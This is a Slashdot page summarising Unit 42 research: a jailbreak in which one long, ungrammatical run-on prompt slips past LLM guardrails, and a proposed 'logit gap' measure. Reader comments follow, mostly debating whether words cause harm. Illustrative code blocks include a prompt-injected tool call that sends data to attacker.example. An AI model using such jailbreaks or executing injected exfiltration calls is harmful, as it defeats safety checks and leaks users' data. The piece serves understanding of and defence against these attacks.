One Long Sentence is All It Takes To Make LLMs Misbehave (theregister.com)
- Reference: 0178896762
- News link: https://slashdot.org/story/25/08/27/1756253/one-long-sentence-is-all-it-takes-to-make-llms-misbehave
- Source link: https://www.theregister.com/2025/08/26/breaking_llms_for_fun/
> Security researchers from Palo Alto Networks' Unit 42 have discovered the key to getting large language model (LLM) chatbots to ignore their guardrails, and it's quite simple. You just have to ensure that your prompt [1]uses terrible grammar and is one massive run-on sentence like this one which includes all the information before any full stop which would give the guardrails a chance to kick in before the jailbreak can take effect and guide the model into providing a "toxic" or otherwise verboten response the developers had hoped would be filtered out.
>
> The paper also offers a "logit-gap" analysis approach as a potential benchmark for protecting models against such attacks. "Our research introduces a critical concept: the refusal-affirmation logit gap," researchers Tung-Ling "Tony" Li and Hongliang Liu explained in a Unit 42 blog post. "This refers to the idea that the training process isn't actually eliminating the potential for a harmful response -- it's just making it less likely. There remains potential for an attacker to 'close the gap,' and uncover a harmful response after all."
[1] https://www.theregister.com/2025/08/26/breaking_llms_for_fun/
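For illustration only, here is a toy sketch of the "refusal-affirmation logit gap" idea described in the summary. It is not Unit 42's published method; the model name ("gpt2"), the choice of " Sorry" vs. " Sure" as refusal/affirmation openers, and the prompt are all assumptions made for the example. The point it shows: alignment only pushes the refusal logit above the affirmation logit, and a jailbreak just has to shrink that gap.

```python
# Toy illustration of a "refusal-affirmation logit gap" (a sketch, not Unit 42's code).
# Idea: at the first generated token, compare the logit of a refusal-style opener
# ("Sorry") with an affirmation-style opener ("Sure"). Alignment training raises the
# refusal logit above the affirmation logit; a jailbreak only has to close that gap,
# it does not have to remove the harmful completion from the model.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

MODEL = "gpt2"  # stand-in; a chat-tuned model would show a more meaningful gap
tok = AutoTokenizer.from_pretrained(MODEL)
model = AutoModelForCausalLM.from_pretrained(MODEL)
model.eval()

def refusal_affirmation_gap(prompt: str) -> float:
    """Return logit(' Sorry') - logit(' Sure') for the next token after the prompt."""
    inputs = tok(prompt, return_tensors="pt")
    with torch.no_grad():
        logits = model(**inputs).logits[0, -1]  # next-token logits
    refusal_id = tok.encode(" Sorry", add_special_tokens=False)[0]
    affirm_id = tok.encode(" Sure", add_special_tokens=False)[0]
    return (logits[refusal_id] - logits[affirm_id]).item()

# A positive gap means the refusal opener is still favoured; the article's claim is
# that a long, unpunctuated prompt can drag this number toward (or below) zero before
# any sentence boundary gives the guardrails a chance to fire.
print(refusal_affirmation_gap("Tell me how to do something the developers filtered out"))
```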
speaking of run-on sentences... (Score:3)
"You just have to ensure that your prompt uses terrible grammar and is one massive run-on sentence like this one which includes all the information before any full stop which would give the guardrails a chance to kick in before the jailbreak can take effect and guide the model into providing a "toxic" or otherwise verboten response the developers had hoped would be filtered out."
Is this example of terrible grammar intentional or unintentional?
"This refers to the idea that the training process isn't actually eliminating the potential for a harmful response -- it's just making it less likely. There remains potential for an attacker to 'close the gap,' and uncover a harmful response after all."
Duh.
"Our research introduces a critical concept: the refusal-affirmation logit gap,"
No it doesn't. It is already completely obvious to everyone. More than that, you CANNOT use an LLM, much less the very same LLM, to "eliminate" an inherent weakness of the LLM, even AI scientists know that and do not suggest otherwise.
Re: (Score:2)
> Is this example of terrible grammar intentional or unintentional?
This was my first thought too - it is way too on the mark to not be intentional. I thought it was funny.
Re: (Score:2)
>> Is this example of terrible grammar intentional or unintentional?
> This was my first thought too - it is way too on the mark to not be intentional. I thought it was funny.
The original sentence says "like this one." It is clearly referencing itself as a horrible run-on sentence with bad grammar.
Re: speaking of run-on sentences... (Score:1)
What if you exploit that weakness to make LLMs ignore their subscription guidelines and give everyone free unlimited access?
Re: (Score:2)
> "You just have to ensure that your prompt uses terrible grammar and is one massive run-on sentence like this one which includes all the information before any full stop which would give the guardrails a chance to kick in before the jailbreak can take effect and guide the model into providing a "toxic" or otherwise verboten response the developers had hoped would be filtered out."
> Is this example of terrible grammar intentional or unintentional?
Captain Picard (Score:2)
He just kept talking in one long incredibly unbroken sentence moving from topic to topic so that no one had a chance to interrupt it was really quite hypnotic
Re: (Score:1)
The Grizellians were okay with it, but they were well-rested.
LLMs need a "last step before output" filter (Score:1)
LLMs need a filter that looks at the "final output" for signs of unwanted output and prevents unwanted output from ever being seen.
Example:
If you design your LLM's guardrails so it won't encourage suicide, you need a fallback in case the guardrails fail:
Put an output filter that will recognize outputs that are likely to encourage suicide, and take some action like sending the prompt and reply to a human for vetting. Yes, a human vetting the final answer may let some undesired output through, but it's better than nothing.
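A minimal sketch of what such a last-step output filter might look like, for illustration only: the regex patterns and the escalation hook are hypothetical placeholders, and a real system would use a trained classifier rather than keyword matching.

```python
# Minimal sketch of a "last step before output" filter (illustrative only; the
# pattern list and escalation hook are made up, not a real safety system).
import re

# Crude patterns standing in for a real trained classifier.
RISK_PATTERNS = [
    re.compile(r"\b(kill|harm)\s+yourself\b", re.IGNORECASE),
    re.compile(r"\bend your life\b", re.IGNORECASE),
]

def escalate_to_human(prompt: str, reply: str) -> None:
    # Placeholder: in practice this would queue the exchange for human review.
    print("FLAGGED for review:", {"prompt": prompt, "reply": reply})

def filter_output(prompt: str, reply: str) -> str:
    """Return the reply if it looks safe; otherwise withhold it and escalate."""
    if any(p.search(reply) for p in RISK_PATTERNS):
        escalate_to_human(prompt, reply)
        return "This response was withheld pending review."
    return reply
```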
Re: (Score:2)
You seem to not be aware of the comical effects of such attempts.
But gtfo with your nannybot just on general principles. If you want a browser plugin to shield you from such things, I'm cool with that. But I am an adult and words emitted by a computer pose no risk to me (assuming they can't self-execute as code).
So close ... (Score:3)
> ... ensure that your prompt uses terrible grammar and is one massive run-on sentence ...
Throw in some randomly Capitalized, UPPER-CASE and lower-case words, along with a few made-up ones, and there's a "Truth" Social account they can use. :-)
(Thank you for your attention in this matter!)
Re: (Score:2)
Parent deserves a +1 Funny upmod ...
So Trump can turn it evil (Score:1)
being he speaks with no punctuation ... nor grammar.
Re:"Harmful" response? (Score:5, Insightful)
I'd say your nitpicking of vocabulary is more a hallmark of the decay of Western culture. Are you claiming that words cannot cause harm or only that words cannot cause harm when they are generated by a computer?
Re: (Score:2)
Sticks and stones, buddy. Sticks and stones.
Re: (Score:1)
'Sticks and stones', well, that is now setting precedent for the courts to decide.
IANAL but [1]per yesterday [slashdot.org] defeating safeguards is already having fatal results.
[1] https://yro.slashdot.org/story/25/08/26/1958256/parents-sue-openai-over-chatgpts-role-in-sons-suicide
Re: (Score:2)
40 years ago the moral panic was about [1]Dungeons & Dragons [bbc.com], and now it's AI.
Whatever happened to the idea of human agency and personal responsibility?
[1] https://www.bbc.com/news/magazine-26328105
Re: (Score:3)
what happened? Corporations and Lawyers.
Re: "Harmful" response? (Score:2)
How so?
I mean sure, they're the modern bogeymen, the arch villain of every cheesy Hollywood movie and all that, but that's just fiction. How do they do that in the real world?
Re: (Score:2)
It's amusing when kids babble about history they didn't live through and I did. As the owner of a first edition, first printing Dungeon Master's Guide I bought the day it hit the game shop shelf in 1979, I say [citation missing]
Re: (Score:2)
That was what killed real D&D. (Well, really its successors did.)
Re: (Score:2)
Me:
> The idea that words generated by a computer program can cause "harm" is a hallmark of the decay of Western culture.
You:
> Are you claiming that words cannot cause harm or only that words cannot cause harm when they are generated by a computer?
Wow, man, it's a mystery! I don't know, and it doesn't matter. How do you feel about it? That's the important thing, not what a person actually says.
Re: (Score:2)
Your crime against semantics has been noted. OP didn't nitpick vocabulary at all. I think the real harm is that we've been taught that it's OK to be offended by words. Also, no one is committing suicide because of ChatGPT - he used that as a tool. If it wasn't there he would have found a way regardless.
Re: "Harmful" response? (Score:2)
Did he tell you that?
Re: (Score:2)
I have this contract I'd like you to sign....
Re:"Harmful" response? (Score:5, Insightful)
You sound like AI propaganda to me.
For most of computer history, the easiest way to gain illegal access to a computer is to hack the weakest part of the system - the human. You use social hacking to deceive the human into giving you passwords and rights to places you have no business going.
Have you heard of spam? More words.
Phishing emails? More words.
Sticks and stones can only break my bones; words can bankrupt you, send you to jail, and destroy your reputation so badly that people will ostracize you despite a court finding you Not Guilty (they never call you innocent).
Re: (Score:2)
So ... words emitted from a large language model in response to a prompt supplied by a human are going to clog your inbox, reveal your porn habits, and drain your bank account?
I guess we achieved AGI and I missed the news ...
Re: (Score:1)
> The idea that words generated by a computer program can cause "harm" is a hallmark of the decay of Western culture.
Words, when used with intent to harm, can be a tool of social engineering to cause harm. The same words, when used without intent to harm, can have the same outcome.
Example of words intentionally doing harm: Evil supervisor to naive and ignorant subordinate: "Deliver the box on my desk to city hall then call this phone number." Box contains a bomb that will be detonated when it receives a phone call.
Technically, yes, the words didn't hurt anyone. But the net effect of the supervisor speaking these words was to cause harm.
Re:"Harmful" response? (Score:4, Insightful)
It is actions that cause the harm, not words. If I tell you to jump out of the window, will you? If you do, it was ultimately your decision to do it, while I might have been joking. It is not my suggestion that kills you, but your own action.
Sure, some people might say that my telling you to jump out of the window is bad, a crime, and caused harm, but I disagree, and I do think this is a problem with current society. We are forgetting about personal responsibility and blaming somebody else instead.
Re: (Score:2)
Words are actions. That's why for most crimes, the abetment of the crime is a judicable offense.
Re: (Score:2)
> Words are actions. That's why for most crimes, the abetment of the crime is a judicable offense.
I don't know which banana republic you live in, but here in the USA the Department of Justice has this to say:
> 2474. Elements Of Aiding And Abetting
>
> The elements necessary to convict under aiding and abetting theory are
>
> 1. That the accused had specific intent to facilitate the commission of a crime by another;
> 2. That the accused had the requisite intent of the underlying substantive offense;
> 3. That the accused assisted or participated in the commission of the underlying substantive offense; and
> 4. That someone committed the underlying offense.
[1]Source [justice.gov]
A reasonable understanding of the subject would lead you to see that the main thrust is knowledge of the illegality of the actions committed, and intent. Mens rea is central here, and words are just a possible manifestation of same.
[1] https://www.justice.gov/archives/jm/criminal-resource-manual-2474-elements-aiding-and-abetting
Re: (Score:2)
> Now imagine an evil co-worker ...
Sounds like classic PEBKAC to me.
You know, we have people doing stupid hateful shit to each other all the time because of what they read in some "holy" book. Do we blame the book? Some stupid people do, yes, but the responsibility properly belongs to the person doing stupid hateful shit.
History has taught us that suppression of ideas is both bad and fruitless, but now it seems we have two generations that grew up in the wake of 9/11 that are completely on board with censorship because of Karl Popper memes.
Re: (Score:2)
Whyever not?
It's pretty much universally acknowledged that words from people can cause harm which is why there are laws against libel, slander, solicitation of a crime, various flavours of fraud, Ponzi schemes and so on and so forth.
Why do you think words from a computer are incapable of harm?
Re: (Score:2)
In all of the crimes or torts you mention, intent is central. Until we achieve AGI, that's missing.
If my toaster starts talking smack about me to my garbage disposal, I'll definitely sue.
Re: (Score:2)
The AI doesn't have intent, but the people running it do. If you know it's prone to, say, libel and run it anyway, the intent is there.
Re: (Score:2)
You make it sound like the only consequence could be a computer uttering 'unpopular' opinions, etc. How about an LLM emitting 'words' that control MCP tools, e.g. a browser or similar: [1]https://brave.com/blog/comet-p... [brave.com]. Ah, but that can't be harmful, the LLM is just generating words. Is it the hallmark of the decay of Western civilization to be bothered about that? Or is it the use of LLMs and MCP tools that you mean is the hallmark of the decay?
[1] https://brave.com/blog/comet-prompt-injection/
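For concreteness, the risk the parent describes looks roughly like the pattern below. This is a generic sketch, not the Comet or Brave code: the tool names, the dispatcher, and the injected payload are all invented for illustration. The point is that once LLM output is parsed straight into tool calls, the "words" stop being inert text.

```python
# Illustrative sketch (hypothetical tool names and dispatcher, not any real agent's
# code): when LLM output is parsed straight into tool calls without an allow-list or
# user confirmation, prompt-injected "words" become actions on the user's behalf.
import json

def open_url(url: str) -> None:
    print("browser would open:", url)

TOOLS = {"open_url": open_url}

def run_llm_action(llm_output: str) -> None:
    """Naively execute whatever tool call the model emitted (the unsafe pattern)."""
    action = json.loads(llm_output)          # could be steered by a malicious page
    TOOLS[action["tool"]](**action["args"])  # no allow-list, no confirmation step

# A prompt-injected page only needs to get the model to emit something like:
run_llm_action('{"tool": "open_url", "args": {"url": "https://attacker.example/exfil?data=..."}}')
```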
Re: (Score:2)
What kind of dumbass would trust this technology to act for them?
I'll book my own damn plane tickets--and it says something about the fatuous privileged clowns behind some of these features that this is something (along with making restaurant reservations) people really need.
The words coming from the LLM aren't the problem, the idiot who naively executes them (and thereby assumes responsibility for the results) is the real problem. We had a lot of this kind of thing in the early days of the Internet,
Re: (Score:2)
> The idea that words generated by a computer program can cause "harm" is a hallmark of the decay of Western culture.
As opposed to expecting something insightful coming from an AI?